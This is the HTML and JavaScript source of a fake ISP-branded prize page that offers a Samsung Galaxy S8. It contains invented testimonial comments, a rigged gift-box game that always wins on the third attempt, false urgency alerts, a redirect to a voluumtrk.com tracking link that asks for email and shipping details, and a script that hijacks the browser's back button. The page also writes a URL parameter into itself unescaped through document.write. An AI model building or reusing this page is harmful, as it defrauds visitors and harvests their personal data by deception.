<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

<base #href="">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="robots" content="noindex, nofollow, noarchive">
<title>Prize Alert!!!</title>


<script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>
<link rel="stylesheet" href="style.css" type="text/css">
</head>
<body>
<style>
.addCommentBox,.comments{background:#eeeff4;}.comments{border-radius:px;margin:10px}.terms{font-size:12px;color:#c2c2c2}.addCommentBox{margin-top:0;border:0;text-align:right;fontface:arial;}.commentTextBox{margin:3px 0;width:100%;height:40px;fontface:arial;left:0;}
input[type=button]{background-color:#426bc3; color:white; border: 1px solid #06328f; padding-top:3px;padding-bottom:3px;}
</style>
<div class="header"><b><script>document.write(getURLParameter('isp'))</script></b>'s exclusive offer for today!</div>
<div class="container">
<h1 style="margin:0; padding:0">Dear client,
</h1>
<p style="margin:0; padding:0; padding-bottom:5px;">We would like to thank you for your loyalty to <b><script>document.write(getURLParameter('isp'))</script></b>, therefore, we offer you a chance to win a <b>Samsung Galaxy S8</b>!</p>
<div class="instructions">
<h2>Win a Galaxy S8</h2>
<h3><span class="bounce">↓</span> Choose your gift box. <span class="bounce">↓</span></h3>
</div>
<div id="spinnerPhone" style ="alignment">
  <img src="iphone7after.png">
</div>
<div id="boxes" class="boxes">
<div id="0"><img src="box.png"></div>
<div id="1"><img src="box.png"></div>
<div id="2"><img src="box.png"></div>
<div id="3"><img src="box.png"></div>
<div id="4"><img src="box.png"></div>
<div id="5"><img src="box.png"></div>
<div id="6"><img src="box.png"></div>
<div id="7"><img src="box.png"></div>
<div id="8"><img src="box.png"></div>
<div id="9"><img src="box.png"></div>
<div id="10"><img src="box.png"></div>
<div id="11"><img src="box.png"></div>
</div>
<div class="comments">
<div style="margin-bottom:0; padding-bottom:1px;">
<small><span id="likes" class="likee">3.6K</span></small><hr style="background-color:#e9e9e9; padding:0; border:0">
<hr style="height:1px;border:none;color:#dfe3ee;background-color:#dfe3ee;">
</div>
<div style="margin-top:0;">
<span class="photoo"></span>
<div class="addCommentBox" style="margin-top:-10px; padding-top:0px;">
			<textarea name="comment" class="commentTextBox" placeholder="Write a comment..." style="resize:none"></textarea>
			<br>
			<input type="button" onclick="alert('Thank you for your comment, it will be published after being reviewed.')" value="Comment">
</div>
</div>
<hr style="height:1px;border:none;color:#dfe3ee;background-color:#dfe3ee; width:95%; margin-top:0; margin-bottom:0;">
<div><span class="photo p1"></span>
<div><b>Pauline Collet</b>
<p>OMG &#x1F631; this is literally the best day of my life. Been wanting to upgrade my phone for so long and finally I can have a new Galaxy S8! Just enter my information, now I only need to wait &#x1f601;</p><small><span>Like</span> · <span>Reply</span> · <span class="likeee">47</span> · <u>20 minutes ago</u></small></div>
</div>
<div><span class="photo p2"></span>
<div><b>Peter Bryan</b>
<p>Is it possible to play again?</p><small><span>Like</span> · <span>Reply</span> · <span class="likeeee">14</span> · <u>45 minutes ago</u></small></div>
</div>
<div><span class="photo p3"></span>
<div><b>Hope Holmes</b>
<p>I just received my S8 this morning. It looks astonishing &#x1F60D; </p><img src="unboxing2.jpg" alt="" style="padding-bottom:15px"><br><small><span>Like</span> · <span>Reply</span> · <span class="likee">124</span> · <u>1 hour ago</u></small></div>
</div>
<div><span class="photo p4"></span>
<div><b>Philip Tate</b>
<p>I won guys! Picked the right one on my 2nd time lol &#x1F60B;</p><img src="unboxing.jpg" alt="" style="padding-bottom:15px"><br><small><span>Like</span> · <span>Reply</span> · <span class="likeee">86</span> · <u>1 hour ago</u></small></div>
</div>
<div><span class="photo p5"></span>
<div><b>Nicholas Alexander</b>
<p>This is fake! All the boxes are empty &#x1F621;</p><small><span>Like</span> · <span>Reply</span> · <span class="like">6</span> · <u>2 hours ago</u></small></div>
</div>
<div><span class="photo p6"></span>
<div><b>Berenice Wilkins</b>
<p>I thought this was a prank but my Galaxy S8 has arrived this morning. However, you must carefully follow all the instructions.</p><small><span>Like</span> · <span>Reply</span> · <span class="likeeeee">24</span> · <u>2 hours ago</u></small></div>
</div>
<div><span class="photo p7"></span>
<div><b>Silas Dean</b>
<p>Third time is the charm! Now I don't have to spend money to get a new phone &#x1F602;</p><small><span>Like</span> · <span>Reply</span> · <span class="like">18</span> · <u>3 hours ago</u></small></div>
</div>
<div><span class="photo p8"></span>
<div><b>Thomas Widmann</b>
<p>I LOST &#x1F61E;</p><small><span>Like</span> · <span>Reply</span> · <span class="like">1</span> · <u>4 hours ago</u></small></div>
</div>
<div><span class="photo p9"></span>
<div><b>Robert Gaines</b>
<p>I came across this game last year, but I just ignored it because I thought it was some kind of scam. But this time I tried it and I won :)</p><small><span>Like</span> · <span>Reply</span> · <span class="likeeee">52</span> · <u>4 hours ago</u></small></div>
</div>
<div><span class="photo p10"></span>
<div><b>Sharlene Sharp</b>
<p>Thank you so much, it’s just amazing, I’ve never won anything online before!
<script>document.write(getURLParameter('isp'))</script>is the best service provider!!!</p><small><span>Like</span> · <span>Reply</span> · <span class="likeee">37</span> · <u>4 hours ago</u></small></div>
</div>
<div><span class="photo p11"></span>
<div><b>Christopher Weaver</b>
<p>Is there someone who really won?</p><small><span>Like</span> · <span>Reply</span> · <span class="like">15</span> · <u>4 hours ago</u></small></div>
</div>
<div><span class="photo p12"></span>
<div><b>Marie Sappez</b>
<p>Oh, am I the only one who lost? :(</p><small><span>Like</span> · <span>Reply</span> · <span class="like">3</span> · <u>5 hours ago</u></small></div>
</div>
<div><span class="photo p13"></span>
<div><b>Jonathan Levine</b>
<p>You guys are incredible! Thank you for doing this!</p><small><span>Like</span> · <span>Reply</span> · <span class="likeee">22</span> · <u>5 hours ago</u></small></div>
</div>
<div><span class="photo p14"></span>
<div><b>Ella Singleton </b>
<p>YES, I won! </p><small><span>Like</span> · <span>Reply</span> · <span class="likee">58</span> · <u>6 hours ago</u></small></div>
</div>
<div><span class="photo p15"></span>
<div><b>Oliver Blake</b>
<p>Thank you! Thank you! Thank you! Thank you! Thank you</p><small><span>Like</span> · <span>Reply</span> · <span class="likeee">25</span> · <u>6 hours ago</u></small></div>
</div>
<div><span class="photo p16"></span>
<div><b>Peng Qi</b>
<p>Is this a joke?</p><small><span>Like</span> · <span>Reply</span> · <span class="likeeee">5</span> · <u>7 hours ago</u></small></div>
</div>
<script>
        'use strict';
        'use strict';
        (function(_window, _document, _location) {
            var boxes = _document['querySelectorAll']('#boxes > div');
            var imgFiles = ['box_o_t', 'box_o_b', 'iphone7'],
                images = [];
            var steps = 3;
           /* for (var index = 0; index < imgFiles['length']; index++) {
                images[index] = new Image();
                images[index]['src'] = 'http://aunga.voluumtrk.com/click' + imgFiles[index] + '.png'
            }; */
            for (var index1 = 0; index1 < boxes['length']; index1++) {
                boxes[index1]['id'] = index1;
                boxes[index1]['onclick'] = function() {
                    var token = 'attempt' + Number(4 - steps).toString();

                    var boxElement = this;
                    this['onclick'] = null;
                    this['innerHTML'] = '<img src="box_o_t.png" class="box-o-t">';
                    if (--steps === 0) {
                        setTimeout(function() {
                            boxElement['className'] += ' discover'
                        }, 10);
                        this['innerHTML'] += '<img src="iphone7.png" class="iphone">';
                        $("#boxes").hide(900);
                        $("#spinnerPhone").delay(1000).show(100);
                        setTimeout(function() {
                            this['innerHTML'] += '<img src="iphone7after.png" class="rotate">';
                            _window['onbeforeunload'] = null;
                            alert('CONGRATULATIONS 🎉🎉🎉\n\nYour Samsung Galaxy S8 has been reserved for a period of 5 minutes!\n\n\Please claim your Galaxy S8 within this period of time, or it will be given to the next lucky winner.\n\nEnter your valid e-mail and shipping address on the next page in order to receive your Samsung Galaxy S8! ');
                            _location['href'] = 'http://aunga.voluumtrk.com/click'
                        }, 1500)
                    } else {
                        setTimeout(function() {
                            alert('Sorry, this gift box is empty! 😓\n\n\You still have (' + steps + ') attempts left.\n\n GOOD LUCK!')
                        }, 400)
                    };
                    this['innerHTML'] += '<img src="box_o_b.png" class="box-o-b">'
                }
            }
        })(window, document, location)
    </script>


<script>
window.onload = function() {
    $("#spinnerPhone").hide();
    setTimeout(function() {
                        
    alert("Congratulations 🎉🎉🎉\n\nThank you for trusting and using " + getURLParameter('isp') + " service! It would be our pleasure to continue serving you.\n\nWe would like to offer you an exclusive chance to win a Samsung Galaxy S8! All you have to do is choose the correct gift box.\n\n\Notice: You only have 3 attempts.\n\nGOOD LUCK!");}, 10);
};
</script>
<script type="text/javascript"> 
! function () { 
var t; 
try { 
for (t = 0; 10 > t; ++t) history.pushState({}, "", "#"); 
onpopstate = function (t) { 
t.state && location.replace("#") 
} 
} catch (o) {} 
}(); 
</script>  
</body>
</html>